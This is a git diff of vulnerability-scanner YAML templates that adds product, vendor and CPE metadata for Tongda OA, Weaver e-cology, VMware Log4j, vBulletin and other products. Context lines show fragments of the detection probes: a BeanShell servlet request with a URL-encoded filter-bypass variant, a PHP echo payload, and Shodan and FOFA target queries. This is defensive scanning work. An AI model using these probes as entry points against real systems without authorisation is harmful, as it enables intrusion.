--- a/http/vulnerabilities/other/xxljob-executor-unauth.yaml
+++ b/http/vulnerabilities/other/xxljob-executor-unauth.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 2
fofa-query: app="XXL-JOB"
+ product: xxl-job
+ vendor: xuxueli
tags: xxljob,unauth,misconfig,rce
+ classification:
+ cpe: cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/other/yeswiki-sql.yaml b/http/vulnerabilities/other/yeswiki-sql.yaml
index a4a1b665a5..d54499415f 100644
--- a/http/vulnerabilities/other/yeswiki-sql.yaml
+++ b/http/vulnerabilities/other/yeswiki-sql.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
+ cpe: cpe:2.3:a:yeswiki:cercopitheque:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"yeswiki"
+ product: cercopitheque
+ vendor: yeswiki
tags: yeswiki,sqli,huntr
variables:
num: "999999999"
diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml
index b12f388299..8c055cab63 100644
--- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml
+++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:yeswiki:cercopitheque:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.html:"yeswiki"
+ product: cercopitheque
+ vendor: yeswiki
tags: yeswiki,xss,stored-xss,huntr,intrusive
http:
diff --git a/http/vulnerabilities/other/yeswiki-xss.yaml b/http/vulnerabilities/other/yeswiki-xss.yaml
index a7bcf2cb2e..b6768d26a4 100644
--- a/http/vulnerabilities/other/yeswiki-xss.yaml
+++ b/http/vulnerabilities/other/yeswiki-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cwe-id: CWE-79
+ cpe: cpe:2.3:a:yeswiki:yeswiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"yeswiki"
+ product: yeswiki
+ vendor: yeswiki
tags: yeswiki,huntr,xss
http:
diff --git a/http/vulnerabilities/phpmyadmin-unauth.yaml b/http/vulnerabilities/phpmyadmin-unauth.yaml
index e325d74c2d..7619927a38 100644
--- a/http/vulnerabilities/phpmyadmin-unauth.yaml
+++ b/http/vulnerabilities/phpmyadmin-unauth.yaml
@@ -12,8 +12,12 @@ info:
max-request: 6
shodan-query: html:"server_databases.php"
fofa-query: body="server_databases.php"
+ product: phpmyadmin
+ vendor: phpmyadmin
tags: misconfig,phpmyadmin,unauth
+ classification:
+ cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
index 0c074ed732..01a3c9360b 100644
--- a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
@@ -12,7 +12,11 @@ info:
verified: true
max-request: 3
fofa-query: title="RG-UAC登录页面" && body="admin"
+ product: rg-uac
+ vendor: ruijie
tags: rg-uac,file-upload,intrusive,ruijie
+ classification:
+ cpe: cpe:2.3:h:ruijie:rg-uac:*:*:*:*:*:*:*:*
variables:
random_str: "{{rand_base(6)}}"
match_str: "{{md5(random_str)}}"
@@ -37,4 +41,4 @@ http:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2, '{{match_str}}')"
condition: and
-# digest: 4b0a004830460221009a7c5ba834a96f9836326553b14fe11787d36d06478e011a287734e645e964de022100bd2b9ac186ec1a2565bba42a5ad370496877fc519f64a830aae2159ab3b7bf44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009a7c5ba834a96f9836326553b14fe11787d36d06478e011a287734e645e964de022100bd2b9ac186ec1a2565bba42a5ad370496877fc519f64a830aae2159ab3b7bf44:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/ruijie/ruijie-password-leak.yaml b/http/vulnerabilities/ruijie/ruijie-password-leak.yaml
index 12dc278c42..fa0280d64b 100644
--- a/http/vulnerabilities/ruijie/ruijie-password-leak.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-password-leak.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"Get_Verify_Info"
+ product: rg-uac_firmware
+ vendor: ruijie
tags: password,leak,ruijie,exposure,firewall,router
+ classification:
+ cpe: cpe:2.3:o:ruijie:rg-uac_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
index 142ad12c55..e4315e3f97 100644
--- a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
+++ b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: title="SANGFOR | NGAF"
+ product: next-gen_application_firewall
+ vendor: sangfor
tags: sangfor,lfi
+ classification:
+ cpe: cpe:2.3:a:sangfor:next-gen_application_firewall:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml b/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml
index cc2218efd6..efdba7bf31 100644
--- a/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml
+++ b/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml
@@ -13,8 +13,12 @@ info:
verified: "true"
max-request: 1
shodan-query: html:"Sitecore"
+ product: sitecore.net
+ vendor: sitecore
tags: xss,sitecore,cms
+ classification:
+ cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml
index 707f115b80..d4dab11913 100644
--- a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml
+++ b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml
@@ -14,9 +14,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
+ cpe: cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.favicon.hash:116323821
+ product: h2
+ vendor: h2database
tags: springboot,rce,jolokia
http:
diff --git a/http/vulnerabilities/thinkphp6-arbitrary-write.yaml b/http/vulnerabilities/thinkphp6-arbitrary-write.yaml
index b0e22d6d0f..8ae1c5dddd 100644
--- a/http/vulnerabilities/thinkphp6-arbitrary-write.yaml
+++ b/http/vulnerabilities/thinkphp6-arbitrary-write.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 2
shodan-query: title:"ThinkPHP"
+ product: thinkphp
+ vendor: thinkphp
tags: thinkphp,file-upload,rce
+ classification:
+ cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
variables:
random_filename: "{{to_lower(rand_base(11))}}"
diff --git a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
index 88cad8c7c7..11df35d3dc 100755
--- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
+++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 2
fofa-query: app="TDXK-通达OA"
+ product: office_anywhere_2017
+ vendor: tongda2000
tags: tongda,fileupload,intrusive,router
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:*
variables:
string: "tongda-action-uploadfile"
@@ -65,4 +69,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022042e581b6843ee7348560b8fe21246c3b7751969e2afa7f1fd73c390020032c1e0220789abf641572fc5db8ec7d2db073b66ccdf3122620c04fa572349b59257e5fe0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022042e581b6843ee7348560b8fe21246c3b7751969e2afa7f1fd73c390020032c1e0220789abf641572fc5db8ec7d2db073b66ccdf3122620c04fa572349b59257e5fe0:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml
index 007457134a..bf1848e84b 100644
--- a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml
+++ b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml
@@ -14,8 +14,12 @@ info:
shodan-query: title:"通达OA"
fofa-query: title="通达OA"
zoomeye-query: app:"通达OA"
+ product: office_anywhere
+ vendor: tongda2000
tags: tongda,auth-bypass,fuzz
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -37,4 +41,4 @@ http:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2,'user_id:') && contains(body_2,'user_name:') && contains(body_2,'var loginUser')"
condition: and
-# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml
index aff30a4d58..5ff47a466d 100755
--- a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml
+++ b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml
@@ -12,7 +12,11 @@ info:
verified: true
max-request: 1
fofa-query: app="TDXK-通达OA"
+ product: office_anywhere
+ vendor: tongda2000
tags: tongda,rce
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
variables:
num: '999999999'
payload: "echo md5({{num}});"
diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
index c963fa5a5b..db333b3ca3 100755
--- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
+++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 2
fofa-query: app="TDXK-通达OA"
+ product: office_anywhere
+ vendor: tongda2000
tags: tongda,sqli,intrusive
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml
index 82e236196b..c36ee0c649 100755
--- a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml
+++ b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="TDXK-通达OA"
+ product: office_anywhere
+ vendor: tongda2000
tags: tongda,unauth,misconfig
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml b/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml
index 8b346b2340..d676145ce2 100755
--- a/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml
+++ b/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="TDXK-通达OA"
+ product: office_anywhere
+ vendor: tongda2000
tags: tongda,sqli
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/tongda/tongda-video-file-read.yaml b/http/vulnerabilities/tongda/tongda-video-file-read.yaml
index a25dbec320..709c3da4d7 100755
--- a/http/vulnerabilities/tongda/tongda-video-file-read.yaml
+++ b/http/vulnerabilities/tongda/tongda-video-file-read.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: icon_hash="1967132225"
+ product: office_anywhere_2017
+ vendor: tongda2000
tags: tongda,lfi
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml b/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml
index a5c783caeb..f329ebc72c 100755
--- a/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml
+++ b/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 3
fofa-query: app="TDXK-通达OA"
+ product: office_anywhere
+ vendor: tongda2000
tags: tongda,auth-bypass,misconfig
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
flow: http(1) && http(2) && http(3)
http:
@@ -53,4 +57,4 @@ http:
- type: dsl
dsl:
- 'status_code == 200 && !contains(body,"用户未登录 ") && contains(body,"loginUser")'
-# digest: 4a0a00473045022013452a801bc921f3284065e0d29a2ec63d9a7eb1dd620b6581ce66a6bcb431d7022100cf60512421e59a2e4a7e43f653c6fde533ea31310fdc7727b683831afd0a9f5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022013452a801bc921f3284065e0d29a2ec63d9a7eb1dd620b6581ce66a6bcb431d7022100cf60512421e59a2e4a7e43f653c6fde533ea31310fdc7727b683831afd0a9f5e:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/ueditor/ueditor-ssrf.yaml b/http/vulnerabilities/ueditor/ueditor-ssrf.yaml
index c68bfc158a..ab9dbf7f47 100644
--- a/http/vulnerabilities/ueditor/ueditor-ssrf.yaml
+++ b/http/vulnerabilities/ueditor/ueditor-ssrf.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 2
shodan-query: html:"UEditor"
+ product: ueditor
+ vendor: baidu
tags: ueditor,ssrf
+ classification:
+ cpe: cpe:2.3:a:baidu:ueditor:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml
index e9430ddd05..86c2a11fe9 100644
--- a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml
+++ b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
+ cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.component:"vBulletin"
+ product: vbulletin
+ vendor: vbulletin
tags: packetstorm,vbulletin,ajaxreg,sqli
http:
@@ -35,4 +38,4 @@ http:
- 'status_code == 200'
- 'contains_any(header, "bb_lastvisit", "bb_sessionhash")'
condition: and
-# digest: 490a0046304402202d7d813de0a8693f99f263f8ae3c471a1df83a3d66ed24996d00c9ed53e925b40220550578abe298198870bc27ab620d63cc010feeefecf6f39a3d1c165c206189e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202d7d813de0a8693f99f263f8ae3c471a1df83a3d66ed24996d00c9ed53e925b40220550578abe298198870bc27ab620d63cc010feeefecf6f39a3d1c165c206189e4:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
index 21ef067826..14ad245dc9 100644
--- a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
+++ b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 1
shodan-query: http.component:"vBulletin"
+ product: vbulletin
+ vendor: vbulletin
tags: vbulletin,sqli
+ classification:
+ cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -39,4 +43,4 @@ http:
- 200
- 503
condition: or
-# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/videoxpert-lfi.yaml b/http/vulnerabilities/videoxpert-lfi.yaml
index 8c6998f4c6..6f26481e26 100644
--- a/http/vulnerabilities/videoxpert-lfi.yaml
+++ b/http/vulnerabilities/videoxpert-lfi.yaml
@@ -12,9 +12,12 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22Directory-Traversal.html
+ cpe: cpe:2.3:a:schneider-electric:pelco_videoxpert:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"VideoXpert"
+ product: pelco_videoxpert
+ vendor: schneider-electric
tags: schneider,pelco,packetstorm,lfi,videoxpert
http:
diff --git a/http/vulnerabilities/vmware/vmware-cloud-xss.yaml b/http/vulnerabilities/vmware/vmware-cloud-xss.yaml
index 9b7b9ddf0b..55202c3063 100644
--- a/http/vulnerabilities/vmware/vmware-cloud-xss.yaml
+++ b/http/vulnerabilities/vmware/vmware-cloud-xss.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Vmware Cloud"
+ product: cloud_foundation
+ vendor: vmware
tags: vmware,xss,cloud
+ classification:
+ cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +37,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205d88d88853e066013a32d7ed78c77379b08fbe8c98a298a83502d5a067bbc726022009d488077eb6df2ebe8abd3325fd96f823689b9ba487057fdb64f6e41fc8d869:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205d88d88853e066013a32d7ed78c77379b08fbe8c98a298a83502d5a067bbc726022009d488077eb6df2ebe8abd3325fd96f823689b9ba487057fdb64f6e41fc8d869:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
index 62a22e45cf..37a0316535 100644
--- a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
+++ b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
@@ -14,10 +14,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:vmware:vrealize_operations_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"vRealize Operations Manager"
+ product: vrealize_operations_manager
+ vendor: vmware
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
index d32f405472..a910bd9427 100644
--- a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
+++ b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
@@ -17,9 +17,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"VMware VCenter"
+ product: vcenter_server
+ vendor: vmware
tags: cve,cve2021,rce,jndi,log4j,vcenter,vmware,oast,kev
http:
diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
index 806ae9023a..66483bdac5 100644
--- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
+++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
@@ -17,10 +17,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:vmware:vrealize_operations:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.title:"vRealize Operations Tenant App"
+ product: vrealize_operations
+ vendor: vmware
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml
index 1645c03cdd..8b2f48211a 100755
--- a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml
+++ b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml
@@ -13,8 +13,12 @@ info:
max-request: 1
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: weaver,ecology,traversal,lfr
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
index 4584920761..91c7c00430 100755
--- a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
+++ b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
@@ -11,8 +11,12 @@ info:
metadata:
max-request: 1
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: ecology,weaver,oa,auth-bypass
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml b/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml
index ab5309607b..833edd8712 100644
--- a/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml
+++ b/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml
@@ -12,9 +12,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
max-request: 1
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: ecology,sqli
http:
diff --git a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
index 40adea2e05..3771e1dd1f 100644
--- a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
+++ b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
@@ -12,7 +12,11 @@ info:
verified: true
max-request: 2
fofa-query: app="泛微-EOffice"
+ product: e-office
+ vendor: weaver
tags: e-office,weaver,intrusive,file-upload
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
variables:
filename: '{{rand_base(7, "abc")}}'
diff --git a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml
index 3610ea5855..2ead9eb6a4 100644
--- a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 1
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: weaver,ecology,sqli
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
index d3a1ef83b1..2539484618 100755
--- a/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
@@ -11,8 +11,12 @@ info:
max-request: 2
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: beanshell,rce,weaver
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -21,13 +25,12 @@ http:
Content-Type: application/x-www-form-urlencoded
bsh.script=print%28%22{{randstr}}%22%29%3B
- - | # bypass waf
+ - |
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
%62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b
-
matchers-condition: and
matchers:
- type: regex
diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
index e187956800..bbceca8e42 100755
--- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@@ -13,7 +13,11 @@ info:
max-request: 2
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: ecology,weaver,oa,sqli
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
variables:
num: "999999999"
diff --git a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
index 92cef0c85e..03c04d9446 100755
--- a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
@@ -13,7 +13,11 @@ info:
max-request: 1
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: ecology,weaver,oa,sqli
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
variables:
num: "999999999"
diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
index f77702bd2f..9f6611d50a 100755
--- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 2
fofa-query: app="泛微-EOffice"
+ product: e-office
+ vendor: weaver
tags: weaver,e-office,oa,sqli
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
variables:
filename: "{{to_lower(rand_base(5))}}"
string: "weaver-group-xml-sqli"
@@ -40,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e520e096b9c8cdad4c8c78447d8bfb96088bfa3c937b57b15dd40914d7ba834e0220136edb9f4931e4d48788270d2f76b8333475d5774ab70dc2a7c03f3fce85b649:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e520e096b9c8cdad4c8c78447d8bfb96088bfa3c937b57b15dd40914d7ba834e0220136edb9f4931e4d48788270d2f76b8333475d5774ab70dc2a7c03f3fce85b649:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
index 7500c42579..eb49c377f7 100755
--- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
@@ -11,7 +11,11 @@ info:
verified: true
max-request: 3
fofa-query: app="泛微-EOffice"
+ product: e-office
+ vendor: weaver
tags: weaver,e-office,oa,instrusive,rce,intrusive
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
variables:
filename: "{{to_lower(rand_base(5))}}"
string: "{{randstr}}"
@@ -53,4 +57,4 @@ http:
- "status_code_1 == 200"
- "status_code_3 == 200 && contains(body_3,'{{string}}')"
condition: and
